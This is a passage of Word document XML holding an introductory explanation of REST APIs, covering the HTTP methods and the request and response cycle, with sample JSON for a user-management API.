          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB127C8" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1846"/>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Each request from the client to the server must contain all the information necessary to understand and process the request (e.g., authentication credentials, query parameters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20500E95" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1846"/>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The server does not store any information about previous requests. Each request is independent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4C2553" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1846"/>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Uniform Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1640A7AA" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1846"/>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RESTful APIs follow a uniform interface, meaning the same standard methods are used to interact with the resources, irrespective of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496CD550" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1846"/>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Resource-Based</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F402C83" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1846"/>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In REST, </w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resources</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the objects or data that you interact with, and each resource is identified by a </w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>URI (Uniform Resource Identifier)</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF87E40" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1846"/>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Resources are accessed via HTTP methods (GET, POST, PUT, DELETE, etc.) to perform operations on the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57101D03" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key HTTP Methods Used in REST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2035EC09" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1847"/>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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACD6FB" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1847"/>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Retrieves data from the server (i.e., fetch a resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C0407D" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1847"/>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Example: GET /users to retrieve a list of users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E76C510" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1847"/>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POST</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D72E5DB" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1847"/>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Creates a new resource on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8E3BD" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1847"/>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Example: POST /users to create a new user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3075BA0E" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1847"/>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PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6F703F" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1847"/>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Updates an existing resource on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6131ED76" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1847"/>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Example: PUT /users/1 to update the user with ID 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536FBA22" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1847"/>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DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00448445" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1847"/>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Deletes a resource from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F92FD57" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1847"/>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Example: DELETE /users/1 to delete the user with ID 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250DEE3E" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1847"/>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PATCH</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22797726" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1847"/>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Partially updates an existing resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DCB03E" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1847"/>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Example: PATCH /users/1 to update specific fields of the user with ID 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35620048" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How REST API Communicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB1A81F" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1848"/>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Request</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398B5832" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1848"/>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A client sends an HTTP request to a REST API endpoint (e.g., GET /users).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C35314" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1848"/>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The request contains the HTTP method, headers (e.g., Content-Type, Authorization), and an optional body (for POST, PUT, or PATCH requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D56E2BC" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1848"/>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Server Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7945102C" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1848"/>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The server processes the request, performing operations like accessing the database or external services to gather the required data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A6BEE" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1848"/>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The server executes business logic and prepares a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5B84B7" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1848"/>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Response</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FF58F8" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1848"/>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The server sends back an HTTP response with a status code (e.g., 200 OK, 404 Not Found), headers (e.g., Content-Type), and a body (usually in JSON or XML format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04D891" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1848"/>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The body contains the data requested by the client or a status message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F50E89" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of How REST API Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623B9222"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Consider a REST API for managing user information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2261FF91" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. GET Request (Retrieve user data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24960FA8" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="005430AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1849"/>
        </w:numPr>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lastRenderedPageBreak/>
        <w:t>Request</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>GET /users/1</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>This retrieves the information for the user with ID 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE3596E" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1849"/>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Response</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA89AE" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB0C54E" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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id": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8E2D29" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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name": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5867400E" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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email": "john.doe@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1141D7" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D178609" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. POST Request (Create a new user):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7DD232" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="005430AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1850"/>
        </w:numPr>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Request</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>POST /users</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F5BA95" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903A79E" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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name": "Jane Smith",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4228CC" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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email": "jane.smith@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5123F020" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABFE98B" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1850"/>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Response</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6F653E" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8BDD01" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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id": 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA5544" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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name": "Jane Smith",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7895ECBD" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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email": "jane.smith@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA8031A" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8BBA6A" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. PUT Request (Update user data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7B304D" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="005430AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1851"/>
